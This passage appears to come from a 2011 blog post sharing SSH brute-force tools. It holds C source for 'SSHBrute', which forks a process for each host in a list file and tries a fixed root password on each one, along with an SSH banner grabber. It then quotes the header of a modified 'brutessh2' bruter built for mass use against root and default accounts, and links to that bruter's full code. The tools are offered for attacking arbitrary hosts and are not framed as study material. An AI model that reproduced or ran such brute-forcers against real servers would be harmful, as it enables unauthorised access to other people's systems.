     printf("\nCan't open \"%s\" to read!\n\n", argv[2]); // Print the error.
     return 0;
}
     pid_t pid;
     pid = fork();
     printf("SSHBrute Started (File = %s, PID = %d).\n", argv[2], pid); // Printed by both parent (child PID) and child (0).
if(pid < 0)
{
     printf("Error: fork()\n");
     return -1;
}
if(pid == 0) // Child: does all the work below.
{
     maxfork = atoi(argv[2]);
while(fgets(buffer, 1000, fd)) // One host per line.
{
     s = strchr(buffer, '\n'); // Find the trailing newline.
if(s != NULL)
{
     *s = '\0'; // Strip it.
}
if(!(fork())) // fork() == 0: grandchild handles this host.
{
     i = 0; // Reset the global counter in the child.
     checkauth("root", "openssh-portable-com", buffer); // One fixed user/pass pair against this host.
     exit(0);
}
else
{
     numfork++; // Parent side of the inner fork.
if(numfork > maxfork) // If the number of forks is greater than max.
{
     for(numfork; numfork > maxfork; numfork--); // Empty loop body: only decrements numfork.
}
     wait(NULL); // Wait for a child before the next line.
}
}
printf("\nSSHBrute Complete (File = %s, PID = %d).\n", argv[2], getpid()); // Print this
}
}
if(strcmp(argv[1], "-grab") == 0) // If the user wants -grab...
{
     char buffer[200], data[] = "\r\n\r\n\r\n"; // The data to send.
     int len = strlen(data); // The data's length.
     int sock; // TCP socket.
     struct sockaddr_in remote; // Declare a sockaddr_in structure (remote).
     remote.sin_family = AF_INET; // Sock family is AF_INET.
     remote.sin_port = htons(22); // Port is 22.
     remote.sin_addr.s_addr = inet_addr(argv[2]); // The ip to connect to.
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) // If no socket!?
{
     printf("Error: socket()\n"); // Print this.
     return -1;
}
if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) // If we can't connect!?
{
     printf("Error: connect()\n"); // Print this.
     return -1;
}
     send(sock, data, len, 0); // Send the data.
     memset(buffer, 0, sizeof(buffer)); // Clear the buffer.
     read(sock, buffer, sizeof(buffer)); // Read the reply; return value ignored, no terminator reserved.
     printf("\nSSHd Banner: %s\n", buffer); // Print this and the buffer.
     close(sock); // Close our socket.
     return 0;
}
if(strcmp(argv[1], "-help") == 0) // If the user wants -help...
{
     printf("%s", banner); // Print this.
     printf("\n\nSSHBrute is a SSH Daemon login brute forcer (-brute), supports a SSHd banner\n"); // Print this.
     printf("grabber (-grab), and of course this message (-help). Need more info? USE THE SOURCE!\n\n"); // Print this.
     return 0;
}
}

Linux SSHd bruter

Posted on 24th September 2011 in Uncategorized

And now for the next one, zorg’s modified:

Linux version:

/*
*brutessh2 is a bruter for the sshd port which attempts to log in as root, trying
*more than 2000 passwords for it.
*users guest, test, nobody and admin with no passwords are included.
*feel free to add more passwords and more users
*this was originally by zorg but this is modded to attack SSH2, modded list (xd)
*For mass use a synscan :
*Eg: ./biggssh sship.txt
* Ok.Try This : Hostname root:12345
*/

The code is too big to post here,
so I put it on pastebin.

http://pastebin.com/S3GciXBf
